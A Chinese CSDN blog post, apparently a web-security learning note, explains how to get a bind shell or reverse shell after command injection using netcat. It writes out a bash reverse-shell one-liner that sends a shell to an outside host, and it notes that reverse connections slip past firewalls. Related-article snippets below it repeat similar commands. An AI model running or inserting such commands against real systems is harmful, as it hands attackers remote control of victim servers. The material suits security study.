命令注入之反弹shell

已于 2024-01-21 12:38:38 修改
阅读量362 收藏 8
点赞数 9
分类专栏: web安全学习 文章标签: linux 服务器 github ssh
于 2024-01-18 22:34:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SmileAssassn/article/details/135685111
版权

命令注入直接将想要执行的命令发送给服务器执行是一种比较普遍的方法,但是有时命令虽然执行了,但是确没有回显,怎么办呢,这个时候就有两种办法,一种是正向shell,一种是反弹shell,所谓shell服务,就是本地监听端口,然后将传入的命令提交给shell终端执行,再将返回的结果进行回显。

需要使用的工具是netcat,如下为下载地址

netcat 1.11 for Win32/Win64

正向bash shell

在目标服务器执行命令主动开启shell,并监听1031端口,NC会监听本地1031端口,一旦外来TCP请求与自己建立连接,就可以将外部输入的命令交给/bin/bash处理

然后在本地进行主动连接

可以看到已经成功连接

于是就可以直接在本地输入命令,就可以看到对应的执行结果回显

弊端就是主动连接目标服务器的端口可能会被防火墙进行拦截,无法进行主动连接。于是就有了一个逆向的思路,让目标服务器主动连接本地的端口,这样就不会被防火墙拦截了

反弹shell

利用端口反连技术,不去正向连接服务器,而是让服务器来主动连接自己。

本地监听1031端口

然后在目标服务器执行命令,可以看到已经建立连接

可以成功执行命令并回显

无法使用NC的情况

无法使用NC的时候,可以使用其他脚本语言来反弹

Bash反弹shell

bash -i >& /dev/tcp/1.1.1.1/9999 0>&1

Smileassissan
关注
  • 9
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
[笔记]Windows安全之《一》反弹Shell
二次元怪兽的博客
04-01 1537
powershell反弹shell常见方式 文章目录正向连接和反向连接(反弹连接)PowerShell的配置常见的反弹Shell总结 正向连接和反向连接(反弹连接) PowerShell的配置 常见的反弹Shell 总结
反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
zrx9988的博客
05-15 388
所谓的正向连接以及反向连接都是需要根据参照物来进行确认的,所举的例子均是以Linux外网服务器为参照;当存在命令注入漏洞时,就需要使用连接符,将上述命令进行拼接执行。反向连接就是我把我的IP与端口号交出去,等待别人来控制我;正向连接就是主动出击,去控制别的服务器;示例:(Windows控制Linux)Linux控制Windows。Windows控制Linux。外网去控制内网的主机。
几种Linux下反弹shell的方法总结
黑面狐
02-14 889
在渗透测试过程中我们需要把测试目标的shell反弹到我们的主机中,方便测试。比如在测试到命令注入时,可以反弹shell进行进一步测试。 一、nc和bash 在我们的主机上执行 nc -lvp port 表示显示执行过程监听端口 在目标主机上执行 bash -i >& /dev/tcp/ip/port 0>$1 这样就可以在我们的主机上执行命令了   二、n...
怎么通过命令注入反弹shell之 Linux渗透之反弹Shell命令解析
小白渣的博客
03-01 4069
前言 当我们在渗透Linux主机时,反弹一个交互的shell是非常有必要的。在搜索引擎上搜索关键字“Linux 反弹shell”,会出现一大堆相关文章,但是其内容不但雷同,而且都仅仅是告诉我们执行这个命令就可以反弹shell了,却没有一篇文章介绍这些命令究竟是如何实现反弹shell的。既然大牛们懒得科普,那我就只好自己动手了。本文就来探讨一下相关命令实现的原理。 Bash 这篇文章的起...
Oracle注入 - 命令执行&Shell反弹
热门推荐
3569
05-07 1万+
https://www.t00ls.net/thread-45663-1-1.html0x01 Oracle安装CentOS 7 安装oracle10g,装了一天,特此记录 oracle9i,10G,11G,各版本下载资源Centos6/7下静默安装oracle10g0x02 命令执行本文测试环境均为:CentOS Linux release 7.2.1511 (Core)Oracle Datab...
反弹shell的N种姿势
记录并分享学习安全的知识点..
09-13 1万+
在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
详解adb shell 常用命令
09-14
主要介绍了详解adb shell 常用命令,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
linux下的调试工具gdb的详细使用介绍
qq_75270497的博客
05-06 968
详细介绍在linux下使用gdb的方法,每个步骤都举例说明,适合复习和新手入门,希望能为能够帮助到大家。
【Linux】开始认识软硬链接
JLX_1的博客
04-29 3319
本文通过对文件系统的总结,讲解了Linux中的软硬链接
Linux 第十八章
一怀明月的博客
05-01 1348
程序地址空间 区间的地址分布 真正理解同一个地址进行读取不同内容 地址空间 虚拟地址和物理地址 虚拟地址: 物理地址: struct mm_struct 页表
Linux的基本指令
道阻且长,行则将至,关注我,和我一起奔赴下一场山海!
05-03 604
先讲基本概念:在Linux当中,它的路径分隔符是斜杠/ Linux当中的文件和目录其实是一棵。可以删文件,但是在删的过程中,系统会给提示时问你确定还是否,如果觉得麻烦,可以直接。05.touch 具体文档格式名(创建一个普通的文件)centos系统中,所有的普通用户都会放在home目录下。大佬的支持和鼓励,将是我成长路上最大的动力。大佬的支持和鼓励,将是我成长路上最大的动力。01.ls指令(查看当前文件下所有列表)可以用来定位当前目录下的一个文件)作用:创建一个普通的文件。04.cd(改变目录)
2. Linux 基本指令(上)|ls|pwd|cd|tree|touch|mkdir|rmdir|rm
最新发布
CoderZzz6310的博客
05-08 812
详细介绍了Linux的部分基础指令,ls,pwd,cd,tree,touch,mkdir,rmdir,rm
【linuxC语言】exec函数族
m0_62599305的博客
05-01 906
在Linux环境下,C语言提供了一组强大的函数族,即exec函数族,用于执行其他程序。这些函数允许程序在运行时加载并执行不同的程序,从而实现了程序之间的无缝交互和协作。本文将介绍exec函数族的基本概念、使用方法以及示例代码,帮助读者更好地理解和利用这些函数。通过本文的介绍,读者应该对Linux环境下的exec函数族有了基本的了解。exec函数族提供了多种方式来执行其他程序,包括根据文件路径执行、在系统PATH环境变量中搜索执行、传递参数和环境变量等。
linux高性能服务器--Ngix内存池简单实现
qq_43538607的博客
05-01 217
linux高性能服务器--Ngix内存池简单实现
Linux-笔记 uboot修改设备树
STM32TSZ的博客
05-06 212
扁平设备树(Flattened Device Tree,FDT),也叫平坦设备树,是设备树的一种二进制表示形式,提高了在嵌入式系统中的传输和解析效率;
Linux反弹shell
05-17
反弹shell是一种技术,可以在远程服务器上执行命令。这个过程通常涉及到两台计算机,一台是攻击者控制的计算机,另一台是受害者的计算机。攻击者可以将恶意代码注入受害者的计算机,然后通过该计算机反向连接攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值